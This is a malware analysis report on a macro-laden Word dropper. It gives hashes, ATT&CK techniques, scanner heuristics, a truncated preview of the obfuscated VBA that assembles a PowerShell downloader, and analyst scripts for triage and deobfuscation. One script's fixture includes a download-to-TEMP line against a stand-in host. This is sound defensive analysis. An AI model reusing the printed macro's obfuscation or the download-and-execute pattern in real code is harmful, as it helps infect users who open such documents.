Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7697473c61ff3b8c…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 284.0 KB
Created: 2018-02-16 19:57:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: e621f2506035485805585fec997a85b7
SHA-1: 40f4bf2d1bc5b3d9b1d4d9af16a2f842411544f9
SHA-256: 7697473c61ff3b8c4a22581e49372f41b2b4a38ed9a84a0a2710a4c53596b699
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The document carries a VBA project with an AutoOpen entry point and a Shell() call, so the macro runs as soon as the document is opened and launches an external process. ClamAV's Doc.Dropper.Agent-6463579-0 signature independently classifies it as a dropper. The macro body is mostly junk arithmetic (Atn/Sgn/Log expressions over never-assigned variables, whose runtime errors On Error Resume Next swallows) wrapped around repeated calls to one helper, yHBjksSgO-style yHBjksbJKSUgsssd(text, start, length), each of which contributes a substring that is concatenated into a larger string. The fragments visible in the preview ([ChAr]N, [STrING], .REpLACe(, -JOIn) are PowerShell syntax, so what is being reconstructed is an obfuscated PowerShell command rather than a bare URL. The visible replace calls swap placeholder tokens for characters: [ChAr]107+[ChAr]98+[ChAr]102 ("kbf") becomes [ChAr]36 ("$"), and [ChAr]74+[ChAr]118+[ChAr]113 ("Jvq") becomes [ChAr]39 (a single quote). With those applied, the fragment kbfpShomE[21]+kbfPsHoMe[30]+JvqxJvq reads $pshome[21]+$pshome[30]+'x', which evaluates to "iex" on a default Windows install (PSHOME is C:\Windows\System32\WindowsPowerShell\v1.0). The assembled command is therefore most likely an obfuscated PowerShell downloader for a second-stage payload; no plaintext URL for that stage appears in the preview, and the one extracted URL (the DrawingML schema namespace) is not an indicator.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6463579-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6463579-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this template text is contradicted by the rest of this report, which did recover a VBA project (macros.bas below, with AutoOpen and Shell()); read the marker as corroborating the AutoOpen finding rather than as a separate, weaker execution surface.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    Note: this URL is the DrawingML XML namespace identifier that Office writes into drawing markup. It is never contacted at runtime and is not an indicator of compromise; the second-stage download location is not visible in plaintext in the preview of the extracted macro.
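The heuristics above can be reproduced statically over decoded VBA text. The script below is an added example for this report, not the scanner's code: it mirrors the rule names and severities of the table, flags auto-exec entry points and Shell()/WScript.Shell use, and extracts URLs with the per-channel labelling the EMBEDDED_URL finding describes. It also shows why a URL split across concatenated literals escapes a plain regex pass, and treats XML schema hosts as non-indicators. The regexes, the namespace allowlist and the sample macro (with the made-up host example.invalid) are constructed for illustration.

```python
"""Static VBA triage reproducing the heuristic categories in the table above.

Added example for this report, not the scanner's own code. Rule names and
severities copy the table; the regexes, the namespace allowlist and the sample
inputs are constructed for illustration (the host example.invalid is made up).
"""
import json
import re

# Entry points Word/Excel run without user action (the report's AutoOpen is one of them).
AUTOEXEC_NAMES = ("AutoOpen", "AutoExec", "AutoNew", "AutoClose", "AutoExit",
                  "Document_Open", "Document_Close", "Workbook_Open")

# Hosts that occur in Office files as XML namespace identifiers. A URL on one of these
# hosts is not an indicator by itself; extend the list for your environment (assumption).
SCHEMA_HOSTS = ("schemas.openxmlformats.org", "schemas.microsoft.com",
                "www.w3.org", "purl.org")

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
# "a" & "b" or "a" + "b": two adjacent VBA string literals joined by a concatenation operator.
LITERAL_CONCAT_RE = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')
# Shell as a function call, as a statement (Shell "cmd ..."), or via the WScript.Shell COM object.
SHELL_RE = re.compile(r'\bShell\b\s*[("A-Za-z]')
WSCRIPT_SHELL_RE = re.compile(r"WScript\.Shell", re.I)


def join_string_literals(vba: str) -> str:
    """Fold "http://" & "host" & "/p" into "http://host/p"; repeat until nothing is left to fold."""
    prev = None
    while prev != vba:
        prev = vba
        vba = LITERAL_CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', vba)
    return vba


def label_url(url: str, channel: str) -> dict:
    """Tag a URL with the channel that reached it and whether its host is a schema namespace."""
    host = re.sub(r"^https?://", "", url).split("/", 1)[0].lower()
    return {"url": url, "channel": channel, "benign_namespace": host in SCHEMA_HOSTS}


def triage(vba: str, body_text: str) -> list:
    """Return findings in the report's shape: rule, severity, and per-URL labels."""
    findings = []
    if vba.strip():
        findings.append({"rule": "OLE_VBA_MACROS", "severity": "medium"})
    for name in AUTOEXEC_NAMES:
        if re.search(rf"\b(?:Sub|Function)\s+{name}\b", vba, re.I):
            findings.append({"rule": "OLE_VBA_AUTOOPEN", "severity": "high", "entry": name})
    if SHELL_RE.search(vba) or WSCRIPT_SHELL_RE.search(vba):
        findings.append({"rule": "OLE_VBA_SHELL", "severity": "critical"})
    urls = [label_url(u, "macro") for u in URL_RE.findall(vba)]
    seen = {u["url"] for u in urls}
    # A URL split across literals is invisible to the plain regex; fold the literals first.
    urls += [label_url(u, "macro (after literal concatenation)")
             for u in URL_RE.findall(join_string_literals(vba)) if u not in seen]
    urls += [label_url(u, "document body") for u in URL_RE.findall(body_text)]
    if urls:
        findings.append({"rule": "EMBEDDED_URL", "severity": "info", "urls": urls})
    return findings


# Constructed inputs, not carved from the sample: a macro that splits its URL across
# literals, and body text carrying the same kind of namespace URL the report extracted.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    Dim u As String
    u = "http://" & "example.invalid" & "/p.exe"
    Shell "cmd /c echo test", vbHide
End Sub
'''
SAMPLE_BODY = 'xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"'

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA, SAMPLE_BODY), indent=2))
```

Run on real input, feed it the decoded output of olevba (the source of macros.bas above) and the document's text streams; the folding step is the minimum needed to surface the kind of concatenated string the sample's helper assembles, and the namespace flag keeps the drawingml URL from being reported as a contact indicator.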

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32319 bytes
SHA-256: cf783b9ca66891fb3af68dacf98d189d66487bc481f1a17bdf691faab706d886
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "isFzISQXcUi"
Function tmHilSGO()
On Error Resume Next
RLodUBSqC = 7249662 + Atn(cRGVUQbhwGVLO) / mzbFz - Sgn(KasMlwVjTuKAXM * Log(jsWzlTzYEY)) / (4518283 - GEdpIImj * YujWv - NDwUnBXGEFHNf)
'qXimaJG = 2138475 + Atn(nnOjP) / qFBrljZHwm - Sgn(qblUIEkPiw * Log(kAvGVAlHV)) / (7990380 - NXwvdBVwwGS * WEZhfjdRjjS - AwfLZWqQl)
'FifoVSN = 2023780 + Atn(NVMbiuk) / RRTYBvSFYrYzjF - Sgn(ujWKYcQBvM * Log(MLSIvXvhADjXd)) / (3048029 - RSYNKj * sSuMjL - BPYLKjHmQ)
pmrNifqRu = (WLuijHraROH) + yHBjksbJKSUgsssd("VpFcouPJvq+'+'JvqREpLACE'+'(eQLCRFeQL,[STrIng][chZOP+ZOPAr]96).REpLACE(eQLZOP+ZOPoVOeQL,[STrIng][cJvZOP+ZOPq+J'+'vqhAr]36).REpLACEZOP+ZOP(eQ'+'L9uKeQJv'+'q+JvqLJvq+Jvq,[STwiwrviwRfRziNiTjHzqmBF", 8, 164)
WTrjarKG = 6963493 + Atn(znILSjz) / BbLGhCSDlS - Sgn(tLCmpKAinlCO * Log(TpFmGwb)) / (2614038 - jwBWudBA * bPzrzwASBRCLsz - zmrzjzp)
cvziCnYiGC = 8360683 + Atn(aiGlSPXcno) / wQcqImovKL - Sgn(nwnZHl * Log(UzmYV)) / (3278146 - pOzmtZXE * PhKBpuJuh - SqKztHmY)
lNTzZL = 3762101 + Atn(oZuLVSXoIQlj) / YYszjOapsqF - Sgn(ifQFiHAEOkpmwj * Log(WUlRiiGlZ)) / (232698 - DKtzvi * NrmGjdIlfVnj - wDsDVH)
cdFUXFT = (KETANin) + yHBjksbJKSUgsssd("irKuYjU]36)) ZOP).REpLACe(([ChAr]7'+'4+[ChAr]118+[ChAr]113),[S'+'TrING][ChAr]39).REpLACe(([ChAr]107+[ChAr]98+[ChAr]102),[STrING][ChAr]3'+'6) q49 .((gv ZO'+'P*MDr*ZOP).nAmE[3,11,2]-JOInZOPZOP)')  -REplAce ([rlkswIrZIOCFKq", 8, 199)
SCKbuJFoiYr = 7166506 + Atn(ItDlwq) / KARqdoJOzUtPiI - Sgn(uUFwc * Log(NOInkA)) / (3390213 - MlvBIKEYUlB * jnUqBGwDwifzNn - lJDtorhlizNVwA)
rPjmJrnJ = 4304498 + Atn(UzfYZ) / RldBOidFwnVMS - Sgn(RrNFBCm * Log(nkzCciLBiOXsr)) / (3301286 - mdzIcAaA * iHidkZXXHYws - LFuuu)
AvYwWtYNAr = 1044254 + Atn(oaXAba) / CuJsMkNUVA - Sgn(RIrAkSSXkRt * Log(iGVtzIj)) / (6542601 - KzUdw * lIoqkuMdzPo - EhEqKIjamrqQ)
OPPbiGXlA = (PpGzlojQ) + yHBjksbJKSUgsssd("whaGOZiQzt;oeQL+eQLVONSBeQL+eQL eJJKEPHDrKEMqEzjuYOKl", 10, 25)
riPzPbU = 3637904 + Atn(AzTmMwXtuR) / dzcfWltQC - Sgn(BptjzNFJ * Log(MHtHSjnY)) / (1978341 - PsmwYzJrqG * lsQMwHaDMjSk - EQksKwjNip)
mKQYHCTYWA = 7606981 + Atn(OtVlqWPCh) / OduTcMUwrw - Sgn(LrINRj * Log(XYCCcmjNFSWND)) / (6602482 - dBGzqTWskwqRC * NYYpV - IZLAHjOHCb)
iWwjc = 5699292 + Atn(ZSOGGUqaBjREl) / hMstzYiDk - Sgn(qFpHE * Log(pIUzsjn)) / (1337152 - EwvdbHHO * CCPJiFLWiKQA - iVnrJjodzZ)
iMuaZ = (mjOwbITVcYiJ) + yHBjksbJKSUgsssd("AviRktmEiwdCvIQLMmcQPUVGzvpr]82+[chAr]70'+')Jvq+Jvq,[STrIng][ZOP+ZOPchAr]39).BXjTFLCFAD", 28, 50)
wpCJtsYrw = 9703112 + Atn(aJFdijkfY) / aNhJcdSoLiTBHv - Sgn(uLUJMkXwKQszZU * Log(tkOabOJHwmHBZT)) / (953668 - CJjkVPWLL * PXtjd - ULljnjUhkEYXF)
zvdwokYrM = 6562204 + Atn(iFrpqtjddNDOZz) / NMIOhNiVlVpw - Sgn(RrzFdDlSBtnzki * Log(VjSviz)) / (8106217 - OqAkvjF * BukMlOzk - OTLSVOzfb)
UXzSMKI = 9995613 + Atn(DuQAb) / kPdTpiwamFz - Sgn(VHmhZUfit * Log(cCFUjDQHdkkGd)) / (6639288 - CYkPsi * zJFsPV - wUzmrmaN)
vDmTMb = (jiPmWBcqQYQaqk) + yHBjksbJKSUgsssd("wKfAVNuq((' (ZOP.( kbf'+'pShomE[ZOP+ZOP21]+kbfPsHoMe[30ZOP+ZOP]+JvqxJvq)( ((Jvq& ( 0r2v'+'eRBosEpREfEJvq+JvqRE'+'NCE.tOs'+'TRiNGcJYwnvrjwzLuvmzIrzNzpwKC", 9, 120)
oNvcfDusWt = 2921865 + Atn(oumjPnTmvhoEl) / iDjhYqPLv - Sgn(BYiljTURFIDPsv * Log(zwqIsirKrRGmXX)) / (4833254 - dwpfrEhFbM * wcTTLkhat - CCOKOrTZh)
aPoWLvfvZHd = 9461566 + Atn(jhaQCQItOkjjM) / hXwvBpzfBavbV - Sgn(NNfuPcSutD * Log(UZhfoW)) / (4257431 - RjUVi * HwBjzUbvjfA - lRjZn)
rSJjMWN = 5672445 + Atn(mjQQzNEZZDwsrB) / HjROuih - Sgn(tBijkESss * Log(arwrfBTvuCrkn)) / (1768093 - WKDIZ * MFHXPVdTVGL - BQJQQ)
kFwNC = (DaXvvOAKTFv) + yHBjksbJKSUgsssd("TjIQMXPiRqeQLoVOSDC);Jvq+Jvq&(teQL+eQLRFeQL+ZOP+ZOPeQLIeQLZOP'+'+ZOP+eQLnveQL+eQL'+'oeQL+eQLtRFeQJvq+JvqL+eQL+teQL+eQLRFkeQL+eQLtReQL+eJvq+JvqQLF+teJvqZOP+ZOP+JvqQL+eQLRFZOP+ZOPe-IteeQZKjGkl", 10, 175)
ThWAvhwEBwT = 8294974 + Atn(QjpcZwjh) / suFtCsikYbZO - Sgn(zzFar * Log(juCXZwkjEW
... (truncated)
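The preview above shows the pattern an analyst has to unwind: junk arithmetic lines interleaved with calls to one helper that takes (text, start, length) and returns a substring, the results being concatenated into a PowerShell command whose trailing .REpLACe( chain swaps placeholder tokens for characters. The script below is an added example for this report, not code from the sample or the scanner. It assumes the sample's helper yHBjksbJKSUgsssd behaves like VBA Mid(text, start, length) with a 1-based start, which must be confirmed by reading the helper body before trusting any output; the VBA fixture is constructed in the shape of the preview with helperFn standing in for the helper name and example.invalid as a made-up host, and no chunk is carved from the sample.

```python
"""Recovering the command a macro assembles from substring chunks, as in the preview above.

Added example for this report, not code from the sample or the scanner. It assumes the
sample's helper (yHBjksbJKSUgsssd) behaves like VBA Mid(text, start, length) with a
1-based start; confirm that by reading the helper body before trusting any output. The
VBA below is constructed in the shape of the preview, with helperFn standing in for the
helper name and example.invalid as a made-up host; no chunk is carved from the sample.
"""
import re

SAMPLE_VBA = r'''
Function tmHilSGO()
On Error Resume Next
RLodUBSqC = 7249662 + Atn(cRGVUQbhwGVLO) / mzbFz - Sgn(KasM * Log(jsWz)) / (4518283 - GEdp * YujWv - NDwU)
pmrNifqRu = (WLuijHraROH) + helperFn("xq7Lm2Zvkbfu=ZOPhttp://example.invalid/a.exeZOP;Qw9", 9, 40)
WTrjarKG = 6963493 + Atn(znILSjz) / BbLGhCSDlS - Sgn(tLCm * Log(TpFm)) / (2614038 - jwBW * bPzr - zmrz)
cdFUXFT = (KETANin) + helperFn("aB(New-Object Net.WebClient).DownloadFile(kbfu,kbfenv:TEMP+ZOP\a.exeZOP);ZZZZ", 3, 71)
OPPbiGXlA = (PpGzlojQ) + helperFn("m.REpLACe(([ChAr]107+[ChAr]98+[ChAr]102),[STrING][ChAr]36).rEpLaCe(([ChAr]90+[ChAr]79+[ChAr]80),[STrING][ChAr]39)00", 2, 112)
End Function
'''

# Default PSHOME on 64-bit Windows; $pshome[21]+$pshome[30]+'x' indexes 'i','e' out of it.
PSHOME_DEFAULT = r"C:\Windows\System32\WindowsPowerShell\v1.0"

CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.I)
REPLACE_RE = re.compile(r"\.replace\(\s*(.+?)\s*,\s*(.+?)\s*\)(?=\s*\.|\s*$)", re.I | re.S)
PSHOME_IDX_RE = re.compile(r"\$pshome\[(\d+)\]", re.I)


def vba_mid(text: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start; a start past the end or an over-long length just truncates."""
    if start < 1 or length < 0:
        raise ValueError("VBA Mid fails with Invalid procedure call for start < 1 or length < 0")
    return text[start - 1:start - 1 + length]


def extract_chunks(vba: str, helper: str) -> list:
    """Substrings the helper calls yield, in source order (assumed Mid semantics)."""
    call = re.compile(r"\b" + re.escape(helper) + r'\("((?:[^"]|"")*)",\s*(\d+),\s*(\d+)\)')
    return [vba_mid(m.group(1).replace('""', '"'), int(m.group(2)), int(m.group(3)))
            for m in call.finditer(vba)]


def resolve_ps_arg(arg: str) -> str:
    """[ChAr]107+[ChAr]98, [STrING][ChAr]36 or a quoted literal -> the text it denotes."""
    codes = CHAR_RE.findall(arg)
    if codes:
        return "".join(chr(int(c)) for c in codes)
    lit = re.fullmatch(r"""\s*(['"])(.*)\1\s*""", arg, re.S)
    if lit:
        return lit.group(2)
    raise ValueError(f"unrecognised PowerShell argument form: {arg!r}")


def undo_replace_chain(ps: str) -> str:
    """Split off the trailing .Replace(...) chain and apply each substitution to the body in order."""
    m = re.search(r"\.replace\(", ps, re.I)
    if not m:
        return ps
    body, chain = ps[:m.start()], ps[m.start():]
    for old, new in REPLACE_RE.findall(chain):
        body = body.replace(resolve_ps_arg(old), resolve_ps_arg(new))
    return body


def resolve_pshome_indexes(ps: str, pshome: str = PSHOME_DEFAULT) -> str:
    """Rewrite $pshome[N] into the quoted character it selects on the given install path."""
    return PSHOME_IDX_RE.sub(lambda m: "'" + pshome[int(m.group(1))] + "'", ps)


def recover_command(vba: str, helper: str) -> str:
    """Join the chunks, then peel one replace layer; real samples nest several such layers."""
    return undo_replace_chain("".join(extract_chunks(vba, helper)))


if __name__ == "__main__":
    print(recover_command(SAMPLE_VBA, "helperFn"))
    print(resolve_pshome_indexes("$pShomE[21]+$PsHoMe[30]+'x'"))
```

Against the real macros.bas, call recover_command with the helper name from the source and expect to iterate: the preview shows at least two token layers (eQL, Jvq, ZOP) and '+' splits inside identifiers, so each pass exposes the next .REpLACe( chain. Resolving $pshome[21]+$pshome[30]+'x' to 'i'+'e'+'x' is what turns the final fragment into the Invoke-Expression that runs the downloaded stage.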